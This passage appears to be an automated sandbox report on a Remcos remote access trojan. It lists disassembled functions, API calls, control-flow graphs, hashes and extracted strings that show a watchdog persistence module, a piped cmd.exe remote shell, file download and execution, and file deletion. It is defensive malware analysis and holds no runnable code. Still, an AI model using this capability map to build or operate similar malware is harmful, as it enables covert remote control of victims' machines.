                        • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                        • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                        Function 0040D3F0 Relevance: 69.0, APIs: 16, Strings: 23, Instructions: 774COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 136 40dd2c 105->136 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->250 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 225->235 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 250->216 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->136 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
                        APIs
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                          • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                        • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                        • API String ID: 1529173511-1365410817
                        • Opcode ID: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                        • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                        • Opcode Fuzzy Hash: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                        • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
                        Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                        • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                        • closesocket.WS2_32(?), ref: 00404E3A
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                        • String ID:
                        • API String ID: 3658366068-0
                        • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                        • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                        • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                        • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                        Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 437 4457a9-4457c0 GetLastError 438 4457c2-4457cc call 445ceb 437->438 439 4457ce-4457d5 call 443005 437->439 438->439 444 44581f-445826 SetLastError 438->444 443 4457da-4457e0 439->443 445 4457e2 443->445 446 4457eb-4457f9 call 445d41 443->446 447 445828-44582d 444->447 448 4457e3-4457e9 call 443c92 445->448 452 4457fe-445814 call 445597 call 443c92 446->452 453 4457fb-4457fc 446->453 456 445816-44581d SetLastError 448->456 452->444 452->456 453->448 456->447
                        APIs
                        • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                        • _free.LIBCMT ref: 004457E3
                        • _free.LIBCMT ref: 0044580A
                        • SetLastError.KERNEL32(00000000), ref: 00445817
                        • SetLastError.KERNEL32(00000000), ref: 00445820
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                        • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                        • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                        • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                        Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 460 445a95-445aa9 461 445ab6-445ad1 LoadLibraryExW 460->461 462 445aab-445ab4 460->462 464 445ad3-445adc GetLastError 461->464 465 445afa-445b00 461->465 463 445b0d-445b0f 462->463 468 445ade-445ae9 LoadLibraryExW 464->468 469 445aeb 464->469 466 445b02-445b03 FreeLibrary 465->466 467 445b09 465->467 466->467 471 445b0b-445b0c 467->471 470 445aed-445aef 468->470 469->470 470->465 472 445af1-445af8 470->472 471->463 472->471
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                        • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                        • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                        • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                        • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                        Function 004459F9 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 481 4459f9-445a23 482 445a25-445a27 481->482 483 445a8e 481->483 484 445a2d-445a33 482->484 485 445a29-445a2b 482->485 486 445a90-445a94 483->486 487 445a35-445a37 call 445a95 484->487 488 445a4f 484->488 485->486 491 445a3c-445a3f 487->491 490 445a51-445a53 488->490 492 445a55-445a63 GetProcAddress 490->492 493 445a7e-445a8c 490->493 494 445a70-445a76 491->494 495 445a41-445a47 491->495 496 445a65-445a6e call 432123 492->496 497 445a78 492->497 493->483 494->490 495->487 499 445a49 495->499 496->485 497->493 499->488
                        APIs
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc__crt_fast_encode_pointer
                        • String ID:
                        • API String ID: 2279764990-0
                        • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                        • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                        • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                        • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9
                        Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 501 40163e-401644 502 401646-401648 501->502 503 401649-401654 501->503 504 401656 503->504 505 40165b-401665 503->505 504->505 506 401667-40166d 505->506 507 401688-401689 call 43229f 505->507 506->507 509 40166f-401674 506->509 510 40168e-40168f 507->510 509->504 511 401676-401686 call 43229f 509->511 512 401691-401693 510->512 511->512
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                        • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                        • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                        • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                        Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 515 443005-443010 516 443012-44301c 515->516 517 44301e-443024 515->517 516->517 518 443052-44305d call 43ad91 516->518 519 443026-443027 517->519 520 44303d-44304e RtlAllocateHeap 517->520 525 44305f-443061 518->525 519->520 521 443050 520->521 522 443029-443030 call 442a57 520->522 521->525 522->518 528 443032-44303b call 440480 522->528 528->518 528->520
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                        • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                        • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                        • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                        Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 531 443649-443655 532 443687-443692 call 43ad91 531->532 533 443657-443659 531->533 541 443694-443696 532->541 534 443672-443683 RtlAllocateHeap 533->534 535 44365b-44365c 533->535 537 443685 534->537 538 44365e-443665 call 442a57 534->538 535->534 537->541 538->532 543 443667-443670 call 440480 538->543 543->532 543->534
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                        • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                        • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                        • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

                        Non-executed Functions

                        Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                          • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                          • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                          • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                        • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                        • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                        • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                        • API String ID: 3018269243-1736093966
                        • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                        • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                        • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                        • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                        Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                        Download Yara Rule
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00406D4A
                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                        • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                          • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                          • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                          • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                          • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                          • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                          • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                        • DeleteFileA.KERNEL32(?), ref: 0040768E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                        • API String ID: 1385304114-1507758755
                        • Opcode ID: 486b9b13a9e0af661d0ec35c4c2a5e664efc39ece2783de0a02d2c3891ac1a86
                        • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                        • Opcode Fuzzy Hash: 486b9b13a9e0af661d0ec35c4c2a5e664efc39ece2783de0a02d2c3891ac1a86
                        • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                        Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 004056C6
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • __Init_thread_footer.LIBCMT ref: 00405703
                        • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                        • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                          • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                        • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                        • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                        • CloseHandle.KERNEL32 ref: 00405A03
                        • CloseHandle.KERNEL32 ref: 00405A0B
                        • CloseHandle.KERNEL32 ref: 00405A1D
                        • CloseHandle.KERNEL32 ref: 00405A25
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                        • String ID: SystemDrive$cmd.exe
                        • API String ID: 2994406822-3633465311
                        • Opcode ID: 2147a93f0d5a00cb25f6f491f58970720c4d85058948b83edc3bb2c9f8c33444
                        • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                        • Opcode Fuzzy Hash: 2147a93f0d5a00cb25f6f491f58970720c4d85058948b83edc3bb2c9f8c33444
                        • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                        Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                        Download Yara Rule
                        APIs
